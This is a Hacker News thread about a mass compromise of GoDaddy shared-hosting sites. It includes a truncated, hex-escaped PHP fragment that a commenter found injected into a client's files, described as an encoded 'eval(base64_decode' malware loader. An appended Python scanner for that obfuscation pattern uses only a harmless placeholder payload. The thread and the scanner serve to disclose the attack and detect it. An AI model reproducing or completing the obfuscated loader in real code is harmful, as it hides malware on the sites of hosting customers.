

Attacks on GoDaddy shared sites - insomniaboldinfoorg - fseek
http://blog.sucuri.net/2010/10/attacks-on-godaddy-sites-insomniaboldinfoorg-com.html

======
dangrossman
Just about every shared host is under attack at all times. Servers where
thousands of people run old versions of widely used open source software
(blogs, CMSs, contact forms, etc.) are such easy targets for exploiting known
security flaws.

Aside from not using shared hosting at all, at least don't use shared hosting
provided by a domain registrar. The combination of supporting millions of
customers and hosting not being their primary business means hosting MUST be
treated as a commodity for them to offer it at all. They're not going to have
the people bandwidth to help customers clean up their sites after they're
hijacked.

------
uurayan
As a former GoDaddy hosting customer, let me tell you all that these attacks
are not new business. There was a point in May where our sites were attacked
weekly with massive damage done. We would perform all the fixes they
recommended yet the next day our site would be hacked to crap again. It is
obviously a huge vulnerability on their side (from what I remember it was with
their phpMyAdmin implementation) yet all they did during this time was blame
their customers saying it was security flaws in the PHP software installed by
their customers.

Stay away from GoDaddy hosting at all costs.

------
fseek
Another one of those "mass" attacks on GoDaddy started today.

The blog doesn't give any numbers, but it seems that a few of their shared
servers were compromised, so a few thousand sites at least.

One of my clients still hosts there and her files were all modified around
1pm today.

What I find unusual is the kind of code added to all PHP files:

" $_8b7b="\x63\x72\x65\x61\x74\x65\x5f\x66\x75\x6e\x63\x74\x69\x6f..
\x6e";$_8b7b1f="\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65";..
$_8b7b1f56=$_8b7b("",$_8b7b1f("aWYoZnVuY.. "

If you decode that, it is an encoded "eval(base64_decode" to load the malware
as hidden as possible.
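
Added example (not part of the thread or of the linked Sucuri post): a small Python check for the pattern in the snippet above, where PHP function names are hidden inside double-quoted strings made only of escapes. It goes one step beyond the post by also decoding octal escapes; the `SUSPICIOUS` list beyond the two names the snippet decodes to, and the sample input, are assumptions constructed for illustration.

```python
import re

# Names that injected PHP often hides behind escaped strings. The first two
# are what the snippet quoted in the post decodes to; the rest are assumptions.
SUSPICIOUS = {"create_function", "base64_decode", "eval", "assert",
              "gzinflate", "str_rot13"}

# One PHP double-quoted escape: \xNN (hex) or \NNN (octal).
ESCAPE = re.compile(r"\\x([0-9a-fA-F]{1,2})|\\([0-7]{1,3})")
# A double-quoted literal built from nothing but 4 or more such escapes.
ESCAPED_LITERAL = re.compile(r'"((?:\\x[0-9a-fA-F]{1,2}|\\[0-7]{1,3}){4,})"')


def decode_escapes(body):
    """Decode a run of hex/octal escapes the way PHP would."""
    def one(m):
        value = int(m.group(1), 16) if m.group(1) else int(m.group(2), 8)
        return chr(value & 0xFF)  # PHP keeps only the low byte
    return ESCAPE.sub(one, body)


def scan_php(source):
    """Return (line_number, decoded_name) for every hidden suspicious name."""
    hits = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for m in ESCAPED_LITERAL.finditer(line):
            name = decode_escapes(m.group(1))
            if name.lower() in SUSPICIOUS:
                hits.append((lineno, name))
    return hits


# Constructed sample modelled on the post's snippet; the payload is the
# base64 of the word "placeholder", not real malware.
SAMPLE = "\n".join([
    "<?php",
    r'$_a="\x63\x72\x65\x61\x74\x65\x5f\x66\x75\x6e\x63\x74\x69\x6f\x6e";',
    r'$_b="\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65";',
    r'$_c=$_a("",$_b("cGxhY2Vob2xkZXI="));',
    r'echo "\x48\x65\x6c\x6c\x6f";',  # benign escaped string, not flagged
])

if __name__ == "__main__":
    print(scan_php(SAMPLE))
```

To sweep a site, read each `.php` file and pass its contents to `scan_php`; a hit in a file that was also modified at the same time as the others is a strong sign of injection.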

